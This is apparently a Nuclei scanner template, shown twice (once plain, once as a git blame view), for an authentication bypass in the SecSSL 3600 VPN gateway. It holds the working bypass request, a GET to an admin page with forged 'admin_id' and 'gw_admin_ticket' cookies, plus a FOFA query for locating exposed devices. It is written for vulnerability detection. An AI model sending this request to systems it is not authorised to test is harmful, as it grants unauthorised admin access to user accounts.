nuclei-templates/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml

id: secsslvpn-auth-bypass

info:
  name: Secure Access Gateway SecSSLVPN - Authentication Bypass
  author: SleepingBag945
  severity: high
  description: |
    The Secure Access Gateway SecSSL 3600 secure access gateway system has an unauthorized access vulnerability. An attacker can obtain the user list and modify the user account password through the vulnerability.
  reference:
    - https://mp.weixin.qq.com/s/BlXK_EB6ImceX83MIJGKsA
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecSSL%203600%E5%AE%89%E5%85%A8%E6%8E%A5%E5%85%A5%E7%BD%91%E5%85%B3%E7%B3%BB%E7%BB%9F%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="安全接入网关SecSSLVPN"
  tags: secsslvpn,auth-bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/group/x_group.php?id=1"

    headers:
      Cookie: admin_id=1; gw_admin_ticket=1;

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "group_action.php"
          - "anonymous"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100c67640436f725deaf4e9f4f97fa738b8f306d42c14e9a45fa34f3acfd33f72cb022100f195f8dfbf0ab067af2d4a69ce9a43d289ad33210afd2bf4d35a2a3cae527897:922c64590222798bb761d5b6d8e72950
Completed Assigned templates - DhiyaneshDK 2023-09-05 12:25:45 +00:00			`id: secsslvpn-auth-bypass`

			`info:`
fixed lint 2023-09-17 16:16:16 +00:00			`name: Secure Access Gateway SecSSLVPN - Authentication Bypass`
updated templates 2023-09-17 16:11:07 +00:00			`author: SleepingBag945`
Completed Assigned templates - DhiyaneshDK 2023-09-05 12:25:45 +00:00			`severity: high`
			`description: \|`
			`The Secure Access Gateway SecSSL 3600 secure access gateway system has an unauthorized access vulnerability. An attacker can obtain the user list and modify the user account password through the vulnerability.`
			`reference:`
			`- https://mp.weixin.qq.com/s/BlXK_EB6ImceX83MIJGKsA`
			`- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecSSL%203600%E5%AE%89%E5%85%A8%E6%8E%A5%E5%85%A5%E7%BD%91%E5%85%B3%E7%B3%BB%E7%BB%9F%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.md`
			`metadata:`
templateman update 2023-10-14 11:27:55 +00:00			`verified: true`
Completed Assigned templates - DhiyaneshDK 2023-09-05 12:25:45 +00:00			`max-request: 1`
			`fofa-query: app="安全接入网关SecSSLVPN"`
			`tags: secsslvpn,auth-bypass`

			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/admin/group/x_group.php?id=1"`
templateman update 2023-10-14 11:27:55 +00:00
Completed Assigned templates - DhiyaneshDK 2023-09-05 12:25:45 +00:00			`headers:`
			`Cookie: admin_id=1; gw_admin_ticket=1;`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "group_action.php"`
			`- "anonymous"`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- "text/html"`

			`- type: status`
			`status:`
templateman update 2023-10-14 11:27:55 +00:00			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4b0a00483046022100c67640436f725deaf4e9f4f97fa738b8f306d42c14e9a45fa34f3acfd33f72cb022100f195f8dfbf0ab067af2d4a69ce9a43d289ad33210afd2bf4d35a2a3cae527897:922c64590222798bb761d5b6d8e72950`